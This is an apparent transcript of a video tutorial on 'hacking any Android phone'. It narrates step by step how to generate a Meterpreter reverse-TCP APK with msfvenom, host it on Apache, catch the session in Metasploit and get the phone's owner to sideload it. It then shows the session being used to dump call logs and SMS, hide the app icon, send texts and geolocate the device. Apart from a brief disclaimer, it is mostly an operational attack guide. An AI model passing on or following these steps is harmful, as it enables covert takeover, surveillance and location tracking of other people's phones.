Guys, welcome back to our channel. Today we are going to be diving into how to hack any Android phone by just generating a payload. It is just a malicious payload that we have to install in Android phone and we get a full access to it. But before that, I have to tell you that it's just a disclaimer. Use only the devices you are authorized to, or the devices you own. Don't attack anyone. I'm not responsible with that. So firstly, you have to open up a terminal like this. Then what you have to do is to act as a root user like this, sudo su. It requires password. Now there it is. I may clear this like this. Then I may navigate with the directory called HTML. It is inside the var directory and the www directory into HTML directory. Then I press enter. Now I am inside there. If I type rectifier, there I can find there is 3 files, or all of them they have extension of the HTML. So I may clear this. So what I have to do is to create the malicious payload inside this directory called HTML. So to create it, type msf venom space forward by -p. P stands for the payload. The payload we're gonna generate is for Android. That's why we use a template called Android Meterpreter /reverse underscore TCP. TCP, remember, it is just a protocol. Now what I have to do is to set the localhost. Localhost is my local IP address, or it is a private IP address. Now to check that, I may divide my terminal into two like this. Then I zoom up in order to enable you to see. Now what I'm going to do is to check my local IP address. As in a Kali Linux or any other Linux distro, to check the IP address, you may type ifconfig, then press enter. Now I am using this local IP address 192.168.24.90. Then I may copy this and I go up there and I paste the other IP address I copied. Now there I have to set error port. It's just a network port. Let me use that one, 444, like that one. Space followed by -o. O stands for the output. How do you want my output? As you know, always in Android phone we may install any application by using APK. APK is APK stands for Android Package Kit. It is just an installer, Android installer. Then I may name it *apk. Then I press enter. So you have to wait for a few seconds. Yeah, now as you see, payload generated with these bytes. This one, it is 10,236. Now here it's saved as *apk. If I press rectifier again, I can find that here there is *apk like that. So now what I have to do is to, let me first remove this. I may exit and I zoom up in order to enable you to view what I'm doing very well. Now let me clear this. Then what I have to do after generating the payload, I have to enable my Apache web server. Now to do that, service Apache 2 start. I have to start the server, Apache web server, in order to enable my Kali Linux to act as a server. in order to enable anyone that can access my data via the web browser. Now I may check its status like this. Now as you see, it is active and running. Here you see. Then I clear this. Then what I have to do is to enter in the Metasploit framework. Now to do that, msef console like this, press enter. It is loading, so wait for a few seconds. This is a powerful tool, Metasploit framework. Then after opening my Metasploit framework, then type use exploit /multi/100 like this, press enter. Now set a payload again. The payload we set is for Android. I think you remember that. Android /metapreter /reverse _TCP. Press enter. There it is. Then set localhost. It is 192.168.24.90 like that. Press enter. Show options like that. All fulfilled. I may clear this. So what I have to do is to set session expiration timeout, such as 3600 seconds, and I press enter. There it is. Then I may run. So wait, it is being launched. They have started. Then I have to go in my Android phone and I go in the search bar or address bar and I type HTTP, not HTTPS, followed by the colon, followed by the dual / followed by the IP address. My local IP address is 192.168.24.90 / the name of the payload. It is *apk like that. I go with that. Download the file again. Yes, download it. Click on keep, then open it. Do you want to install this app? Yes, install. Yeah, then click on more details. Because it is unsafe app blocked, you have to click on install anyway. It requires my pattern. Yeah, it is installing. There it is. Installed, app installed. Then open. Then check if all the permissions enabled. Then click on continue to get the session. Then if I go back in my terminal, there you can view that there is a session opened. Then what I have to type is help like this. Help. Here there is many commands I can learn because I gained the full access to the other Android phone. Then first one I may use a just dump underscore call log is just to extract the phone calls he or she gained into her Android phone or his Android phone. Then I press enter. Now it is saved under this name with extension of .txt like that. Even I can dump the SMS like this. I press enter. They are saved under this name with also extension of .txt. Now if I check the in application menu in my Android phone, I can find that the application is allowed in the application menu. Now to remove it, now here the command hide underscore app underscore icon. Just type hide underscore app underscore icon like this, like sure it is that. Now main activity was hidden. If I go back in the applications, I can't find it in application menu. I already installed it in Android phone, but I can't find it in application menu. Then another attack I can show you is to send SMS. Just type send underscore SMS followed by T. T stands for the text. Put the text under the quotations. Then I may say hey bro like this. Then I go and type -D. D stands for dimension, whom I want to send the other SMS. Then I press the phone number, so like this 78081507 like this. I press enter. Now transmission successful. This means that message sent. If I go back in my Android phone, as you see, there is a number received hey bro. That's my number, because in my Android phone I has a dual SIM card. Yeah, that's it. Here there is more commands. Then I can try to track the Android phone by geolocate like this. I press enter. Now here the location, here the latitude and the longitude. This means that if you use a Google map and paste the latitude and longitude in a Google map, you may find the real location of this Android phone. So this shows that we have a full access, remote access to the Android phone. So I think this is for today. But if you say that background like this means that the session is already running. So thank you guys for watching. Just leave a comment and subscribe for more content. Thank you.